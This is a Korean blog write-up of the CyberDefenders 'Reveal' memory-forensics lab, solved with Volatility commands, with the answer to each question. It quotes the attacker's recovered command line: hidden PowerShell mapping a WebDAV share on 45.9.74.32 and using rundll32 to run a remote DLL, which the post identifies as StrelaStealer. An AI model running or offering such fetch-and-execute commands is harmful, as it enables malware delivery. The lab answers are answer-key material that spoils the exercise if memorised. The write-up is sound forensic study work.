K-Shield 주니어/스터디CTF
Cyberdefenders - Reveal Lab
pkse74
2025. 4. 22. 20:42
메모리 분석하는 문제인거같다.
python vol.py -f .\192-Reveal.dmp windows.cmdline
파워쉘로 수상한 명령어를 입력한것을 볼수가있다.
답 : powershell.exe
python vol.py -f .\192-Reveal.dmp windows.pslist
PID PPID순이다
답 : 4120
python vol.py -f .\192-Reveal.dmp windows.cmdline
답 : 3435.dll
davwwwroot에 접근중인것을 그대로 확인할수있다.
답 : davwwwroot
https://attack.mitre.org/tactics/TA0005/
답 : T1218.011
python vol.py -f 192-Reveal.dmp windows.getsid
sid 맨끝이 1000번대로 시작하는게 일반유저이다
Elon만 1000번대로시작한다
답 : Elon
python vol.py -f 192-Reveal.dmp windows.pslist
로 powershell의 pid를 알아내면
powershell PID : 3692, PPID : 4120이다
python vol.py -f 192-Reveal.dmp windows.cmdline --pid 3692
파워쉘로 무슨 명령어를 쳤는지 확인해보자
1. powershell.exe -windowstyle hidden
- PowerShell을 창 없이(숨김) 실행
- 사용자 눈에 띄지 않게 백그라운드에서 실행
2. net use \\45.9.74.32@8888\davwwwroot\
- net use는 네트워크 공유 폴더(UNC 경로)를 연결하는 명령어
- \\45.9.74.32@8888\davwwwroot\는 웹DAV 서버
- @8888 → 비정상 포트 (HTTP 기본이 아님, 웹서버 우회 목적)
- davwwwroot → 웹DAV의 루트 경로 이름
3. rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry
- rundll32는 윈도우에서 DLL 파일을 실행하는 내장 툴
- 이 명령은 웹DAV 공유에 있는 DLL (3435.dll)을 직접 실행
- entry는 DLL 내부에 있는 함수 이름 (보통 익스포트된 진입점)
즉 웹서버에서 3435.dll 을 실행하는 파일리스 공격이다
공격자의 C2서버인 45.9.74.32를 VirusTotal에 넣어보자
답 : STRELASTEALER